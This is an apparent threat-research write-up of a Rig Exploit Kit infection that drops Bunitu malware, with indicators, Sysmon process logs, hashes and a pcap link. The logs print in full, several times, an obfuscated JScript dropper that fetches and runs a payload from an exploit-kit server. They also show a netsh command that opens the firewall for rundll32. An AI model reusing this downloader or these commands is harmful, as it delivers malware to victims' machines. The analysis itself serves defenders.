Rig Exploit Kit delivers Bunitu Malware

Thanks to @david_jursa for sharing this information on the Rig EK

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2019-04-12-Rig-EK-pcap.zip

Reference: Revisiting The Bunitu Trojan

ASSOCIATED DOMAINS:

78.47.1.197 – jblpulse3.org – Redirect to Rig EK
185.63.191.28 – Rig EK
216.58.206.104 – Post infect C2
62.212.66.85 – Post infect C2

DNS:
f.mashifoug.com – Post infect DNS query
z.mashifoug.com – Post infect DNS query

IMAGES AND DETAILS:

Shown above: Network traffic associated with the redirect to the Rig EK

 

Shown above: Rig EK URL traffic and post infection network

 

Shown above: Post infection DNS traffic

 


Shown above:  Bunitu malware dll remaining persistent in Windows registry

 

Sysmon logs showing parent child relationship and dll communication with C2:

Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d “%%tmp%%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“len”+”gth”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“WScript”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DDDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy” “Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko”
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe”

 

CommandLine wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy”
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine CMd.exe /q /c cd /d “%tmp%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g[“len”+”gth”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“WScript”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DDDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy” “Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko”

 

Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\System32\cmd.exe” /c rad93CC2.tmp.exe
CurrentDirectory C:\Users\Jack\AppData\Local\Temp\
ParentImage C:\Windows\System32\wscript.exe
ParentCommandLine wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy” “Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko”

 

Image C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
CommandLine rad93CC2.tmp.exe
CurrentDirectory C:\Users\Jack\AppData\Local\Temp\
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c rad93CC2.tmp.exe

 

Image C:\Windows\System32\rundll32.exe
CommandLine “C:\Windows\System32\rundll32.exe” “C:\Users\Jack\AppData\Local\miiwlon.dll”,miiwlon C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
CurrentDirectory C:\Users\Jack\AppData\Local\Temp\
ParentImage C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
ParentCommandLine rad93CC2.tmp.exe

 

Image C:\Windows\System32\netsh.exe
CommandLine “C:\Windows\System32\netsh.exe” advfirewall firewall add rule name=”Rundll32″ dir=in action=allow protocol=any program=”C:\Windows\system32\rundll32.exe”
CurrentDirectory C:\Windows\system32\
ParentImage C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
ParentCommandLine rad93CC2.tmp.exe

Image C:\Windows\System32\rundll32.exe
DestinationIp 216.58.206.104
DestinationHostname lhr25s14-in-f8.1e100.net
DestinationPort 443
DestinationPortName https

 

Image C:\Windows\System32\rundll32.exe
Protocol tcp
DestinationIp 62.212.66.85
DestinationHostname hosted-by.leaseweb.com
DestinationPort 443
DestinationPortName https

 

MALICIOUS PAYLOAD ASSOCIATED WITH RIG EK:

rad93CC2.tmp.exe – Initial Payload
Persistence: C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
SHA-256: a167ed97a4ffd9db4a1df9fc151a731b15154c3b20cbb0064f5bb96bd8a863cd
VirusTotal Link

miiwlon.dll – Secondary Payload
Persistence:
C:\Users\Jack\AppData\Local\miiwlon.dll
SHA-256:
723b1dc16c1513fc52e7c23f268e3f5e5c56560698d988d9eb51e4ea6c9b9fd4
Virus Total Link